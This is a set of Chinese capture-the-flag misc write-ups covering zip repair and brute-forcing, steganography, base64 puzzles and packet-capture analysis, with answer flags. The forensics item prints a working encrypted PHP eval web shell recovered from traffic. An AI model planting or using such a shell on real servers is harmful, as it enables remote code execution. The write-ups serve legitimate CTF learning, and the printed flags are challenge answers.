1、[BJDCTF 2nd]最简单的misc-y1ng
题解:
(1)zip伪加密和png文件头部修复
首先使用随波逐流工具修复zip文件的伪加密;然后使用010修复文件头部就可以
2、[BSidesSF2019]delta
题解:一个简单的脑洞题目
3、[GKCTF X DASCTF应急挑战杯]
题解:简单的流量包的分析
(1)追踪http发现了异常的流量
然后首先hex解码;然后base64解码;发现了倒叙的base64编码内容;反转之后解密得到正确的flag
a = 'wIDIgACIgACIgAyIK0wIjMyIjMyIjMyIjMyIjMyIjMyIjMyIjMyIjMyIjMyIjMyIjMyIjMiCNoQD'
b='jMyIjMyIjMyIjMyIjMyIjMyIjMyIjMyIjMyIjoQDjACIgACIgACIggDM6EDM6AjMgAzMtMDMtEjM'
c='t0SLt0SLt0SLt0SLt0SLt0SLt0SLt0SLt0SLt0SLt0SLt0SLt0SLt0SLt0iCNMyIjMyIjMyIjMyI'
d='6AjMgAzMtMDMtEjMwIjO0eZ62ep5K0wKrQWYwVGdv5EItAiM1Aydl5mK6M6jlfpqnrQDt0SLt0SL'
e='t0SLt0SLt0SLt0SLt0SLt0SLt0SLt0SLt0SLt0SLt0SLt0SLt0SLK0AIdZavo75mlvlCNMTM6EDM'
f='z0yMw0SMyAjM6Q7lpb7lmrQDrsCZhBXZ09mTg0CIyUDI3VmbqozoPW+lqeuCN0SLt0SLt0SLt0SL'
g='sxWZld1V913e7d2ZhFGbsZmZg0lp9iunbW+Wg0lp9iunbW+Wg0lp9iunbW+WK0wMxoTMwoDMyACM'
h='DN0QDN0QDlWazNXMx0Wbf9lRGRDNDN0ard0Rf9VZl1WbwADIdRampDKilvFIdRampDKilvVKpM2Y'
i='==QIhM0QDN0Q'
a=a[::-1]
b=b[::-1]
c=c[::-1]
d=d[::-1]
e=e[::-1]
f=f[::-1]
g=g[::-1]
h=h[::-1]
i=i[::-1]
print(a+b+c+d+e+f+g+h+i)
#ffllaagg{{}}WWeellcc00mmee__GGkkCC44FF__mm11ssiiCCCCCCCCCCCC!!
4、[Dest0g3 520迎新赛]EasyEncode
题解:
(1)首先就是简单的zip爆破
(2)首先就是莫斯电码解密;然后hex解码
\u0052\u0047\u0056\u007a\u0064\u0044\u0042\u006e\u004d\u0033\u0074\u0045\u005a\u0057\u0039\u006b\u0061\u0057\u0035\u006e\u0058\u007a\u0046\u007a\u0058\u0032\u0055\u0030\u0063\u0033\u006c\u0066\u004e\u0046\u0039\u0056\u0066\u0051\u0025\u0033\u0044\u0025\u0033\u0044**加粗样式**
一眼就是unicode解密得到base64字符串;然后解密就行
5、[DASCTF Oct X 吉林工师 欢迎来到魔法世界~]giveyourflag
题解:
(1)使用010打开发现了明显的PK;压缩包
(2)发现嵌套了多层的zip压缩包;肯定最后一个压缩包中的内容就是flag;chat 一个脚本;解密到最后得到:
R0RWRldJezdnZ3FnbGwzanl1a2RuY3N0aTlpY3BjM2ZlYjB2NW9wfQ==
base64解密就是正确的flag
6、[NewStarCTF 公开赛赛道]奇怪的PDF
题解:PDF隐写
(1)题目提示是pdf隐写;发现文件头部错误;先修复
(2)打开PDF 并没有发现啥有用的信息;可能是wbStego隐写:然后直接得到正确的flag
7、[NewStarCTF 公开赛赛道]qsdz’s girlfriend 1
题解:
(1)给了一个压缩包,提示他男朋友的生日,生日只算数字的话最多8位最小6位,用ARCHPR爆破,密码为20031201
(2)打开压缩包发现是一张png;最后发现是LSB隐写;得到一串base64编码;解密得到提示
My girlfriend's name has six letters and the first letter is capitalized
(3)最后百度找到了他男朋友的名字;并且生日是20031201
8、[NewStarCTF 2023 公开赛道]3-溯源
题解:流量包 AES解密
(1)首先看以下http流量
http contains "eval"
发现了特殊的字段;尝试解密
得到了key
<?php
@error_reporting(0);
session_start();
$key="e45e329feb5d925b";
$_SESSION['k']=$key;
session_write_close();
$post=file_get_contents("php://input");
if(!extension_loaded('openssl'))
{
$t="base64_"."decode";
$post=$t($post."");
for($i=0;$i<strlen($post);$i++) {
$post[$i] = $post[$i]^$key[$i+1&15];
}
}
else
{
$post=openssl_decrypt($post, "AES128", $key);
}
$arr=explode('|',$post);
$func=$arr[0];
$params=$arr[1];
class C{public function __invoke($p) {eval($p."");}}
@call_user_func(new C(),$params);
?
审计代码发现进行了AES加密;继续分析流量包寻找密文
尝试解密:成功找到base64编码的用户名
9、大怨种
题解:gif分离
(1)首先gif分离得到二维码
然后汉明码在线解密得到lflag
10、[GKCTF X DASCTF应急挑战杯]excel 骚操作
题解:excel隐写
(1)某些单元格设置了只有双击击才能显示内容的格式,Ctrl+A全选然后右键,选择清楚内容->格式
(2)根据上述猜测是二维码;选中该范围Ctrl+H替换,替换为框点击格式,选择背景颜色选择一个黑色单元格
(3)汉信码扫码解密就行
flag{9ee0cb62-f443-4a72-e9a3-43c0b910757e}